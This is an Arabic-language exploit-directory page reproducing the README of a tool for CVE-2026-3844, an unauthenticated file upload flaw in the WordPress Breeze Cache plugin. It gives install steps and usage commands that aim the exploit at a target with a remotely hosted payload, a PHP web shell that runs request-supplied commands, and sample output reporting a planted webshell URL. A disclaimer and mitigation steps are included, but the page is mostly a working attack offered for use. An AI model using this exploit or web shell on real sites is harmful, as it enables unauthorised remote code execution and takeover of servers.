Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-3844 — WordPress - Breeze Cache <= 2.4.4 - رفع ملفات تعسفي دون مصادقة | Kitploit
أدوات/GitHubGitHub/0xgh057r3c0n/cve-2026-3844
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHub0xgh057r3c0n/cve-2026-3844

CVE-2026-3844

WordPress - Breeze Cache <= 2.4.4 - رفع ملفات تعسفي دون مصادقة

عرض المستودع
112منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
WordPress Logo

CVE-2026-3844

Breeze Cache ≤ 2.4.4 - رفع ملفات تعسفي غير مصادق عليه

MIT License Python 3.6+ WordPress


⚠️ إخلاء مسؤولية

root@kitploit:~
هذه الأداة مقدمة لأغراض تعليمية وبحوث أمنية فقط.
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدم هذه الأداة فقط على
الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. لا يتحمل المؤلف
أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.

📋 الوصف

CVE-2026-3844 هو ثغرة حرجة لرفع ملفات تعسفي غير مصادق عليه في إضافة Breeze Cache لووردبريس (الإصدارات ≤ 2.4.4). تفشل الإضافة في التحقق بشكل صحيح من معامل في التعليقات، مما يسمح للمهاجمين عن بُعد برفع ملفات خبيثة (بما في ذلك القشرة الويب) إلى الخادم.

srcset

🔴 الخطورة

  • درجة CVSS: 9.8 (حرجة)
  • ناقل الهجوم: الشبكة
  • المصادقة المطلوبة: لا
  • التأثير: تنفيذ الأوامر عن بُعد (RCE)

🎯 الإصدارات المتأثرة

  • Breeze Cache ≤ 2.4.4
  • ووردبريس جميع الإصدارات (يعتمد على الإضافة)

🔧 التفاصيل التقنية

يستغل الثغرة وظيفة تخزين Gravatar في Breeze. عند نشر تعليق يحتوي على معامل srcset مصمم خصيصًا يحتوي على عنوان URL لملف بعيد، يقوم Breeze بتنزيل الملف وتخزينه محليًا في:

root@kitploit:~
/wp-content/cache/breeze-extra/gravatars/[random_marker][file_extension]

المتطلب الأساسي: يجب تفعيل خيار "Host Files Locally - Gravatars" في إعدادات Breeze.

🚀 التثبيت

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844

# تثبيت التبعيات
pip install pycurl termcolor

💻 الاستخدام

الاستخدام الأساسي

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com

خيارات متقدمة

root@kitploit:~
# التحقق مما إذا كان الهدف ضعيفًا دون استغلال
python3 CVE-2026-3844.py -u http://target.com --check-only

# استخدام عنوان URL مخصص للحمولة
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php

# حفظ المخرجات في ملف
python3 CVE-2026-3844.py -u http://target.com -o shells.txt

# زيادة المهلة للأهداف البطيئة
python3 CVE-2026-3844.py -u http://target.com --timeout 30

وسائط سطر الأوامر

الوسيطالوصف
-u, --urlعنوان URL للهدف (مطلوب)
-p, --payloadعنوان URL للحمولة البعيدة
--timeoutمهلة الطلب بالثواني (الافتراضي: 15)
--check-onlyالتحقق فقط إذا كان الهدف ضعيفًا
-o, --outputحفظ عنوان URL للقشرة في ملف

📝 مثال على حمولة مخصصة

أنشئ قشرة الويب الخاصة بك (shell.php):

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])) {
    echo "<pre>";
    system($_REQUEST['cmd"]);
    echo "</pre>";
}
?>

استضفها في مكان يمكن الوصول إليه، ثم استخدم:

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php

🔍 سلسلة التحقق

تتحقق الأداة تلقائيًا من سلسلة التحقق 4356452d323032362d33383434 (ترميز hex لـ "CVE-2026-3844") في الملف المرفوع لتأكيد نجاح الاستغلال.

🛡️ التخفيف

  1. قم بتحديث Breeze Cache إلى الإصدار 2.4.5 أو أعلى
  2. قم بتعطيل "Host Files Locally - Gravatars" إذا لم يكن ضروريًا
  3. قم بتنفيذ قواعد جدار حماية تطبيقات الويب (WAF)
  4. قم بمراجعة وظيفة التعليقات بانتظام

📸 لقطة شاشة

root@kitploit:~
[*] PHASE 1: VULNERABILITY ASSESSMENT
[*] Checking Breeze plugin version...
[+] Target VULNERABLE (Breeze v2.4.4)

[*] PHASE 2: EXPLOITATION
[!] REQUIREMENT: 'Host Files Locally - Gravatars' MUST BE ENABLED
[*] Step 1: Sending malicious comment...
[+] Comment posted successfully
[*] Step 2: Waiting for Breeze to cache the file...
[*] Step 3: Checking for uploaded file...
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!

[✓] STATUS: SUCCESS
[✓] WEBSHELL URL: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php

📁 هيكل الدليل

root@kitploit:~
CVE-2026-3844/
├── CVE-2026-3844.py    # Main exploit script
├── README.md            # This file
└── LICENSE              # MIT License

📄 الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.

🙏 الاعتمادات

  • المؤلف: 0xgh057r3c0n
  • الاكتشاف: فريق البحث الأمني
  • معرف CVE: CVE-2026-3844

📞 التواصل

  • GitHub: @0xgh057r3c0n
  • الإبلاغ عن المشكلات: GitHub Issues

⭐ الدعم

إذا وجدت هذه الأداة مفيدة، يرجى منحها نجمة ⭐ على GitHub!


بُنيت بـ 🐍 Python | لأغراض تعليمية فقط
تنزيل الأداة